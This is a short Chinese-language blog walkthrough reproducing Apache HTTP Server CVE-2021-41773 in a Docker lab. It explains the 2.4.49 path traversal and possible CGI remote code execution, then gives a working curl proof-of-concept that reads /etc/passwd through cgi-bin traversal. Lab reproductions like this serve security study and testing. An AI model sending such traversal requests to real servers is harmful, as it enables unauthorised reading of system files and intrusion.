Apache CVE-2021-41773 漏洞攻略

2407-2 shw2024-09-23 12:59

漏洞简介

该漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录
<Directory/>Require all granted</Directory>允许被访问的的情况下(默认开启),攻击者可利⽤该路径穿越漏洞读取到Web⽬录之外的其他⽂件在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cgi命令(RCE)

影响版本

Apache HTTP Server 2.4.49
某些Apache HTTPd 2.4.50也存在此漏洞

环境搭建

docker pull blueteamsteve/cve-2021-41773:no-cgid
docker run -d -p 8080:80 97308de4753d

漏洞复现

http://172.16.1.78:8080/

1.使⽤poc

curl http://172.16.1.78:8080/cgi-bin/../../../../etc/passwd

2.⼯具验证

相关推荐
阿里云云原生9 小时前
Apache RocketMQ 5.5.0 发布:LiteTopic 深度解析,如何支撑百万级 AI 会话并发?
apache·rocketmq
清平乐的技术专栏18 小时前
【Doris从零到一】(一)Apache Doris 概述
apache
RestCloud19 小时前
开源vs商业iPaaS:Apache Camel、MuleSoft与RestCloud的正面交锋
开源·apache·ipaas·mulesoft·api管理·集成平台
Volunteer Technology1 天前
集群基础环境搭建(一)
大数据·apache
Volunteer Technology3 天前
集群基础环境搭建(二)
大数据·flink·apache
杨云龙UP3 天前
Linux 根分区被日志吃满?一次 58G Broker 日志清理实战_2026-05-20
linux·运维·服务器·数据库·hdfs·apache
IT布道4 天前
[Web安全] SVG文件上传风险与Apache防御配置实践
web安全·apache·xss
卷Java4 天前
DeepSeek V4 开源 Apache 2.0 之后,闭源模型还香吗?
开源·apache
zhojiew4 天前
在AWS中国区使用NYC Taxi数据集在Apache Flink(KDA)中实现流数据处理管道的实践
flink·apache
m0_474606785 天前
JAVA - 使用Apache POI 自定义报表字段手写导出(支持-合并单元格)
java·开发语言·apache
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法04【AI】2026 年具身智能模型和世界模型总结05裂开!ChatGPT 居然开始要手机号验证,附详细解决方法06CC-Switch & Claude 基于 Linux 服务器安装使用指南07Codegraph 实战:用知识图谱让 AI 编程效率翻倍08Codex使用DeepSeek API的方法(cc switch + codex bridge方案)09CC-Switch 全平台下载、安装与使用全指南(Windows/macOS/Linux)10给 Claude Code 装上“技能库”和“眼睛”:配置 Skills 与图片识别实战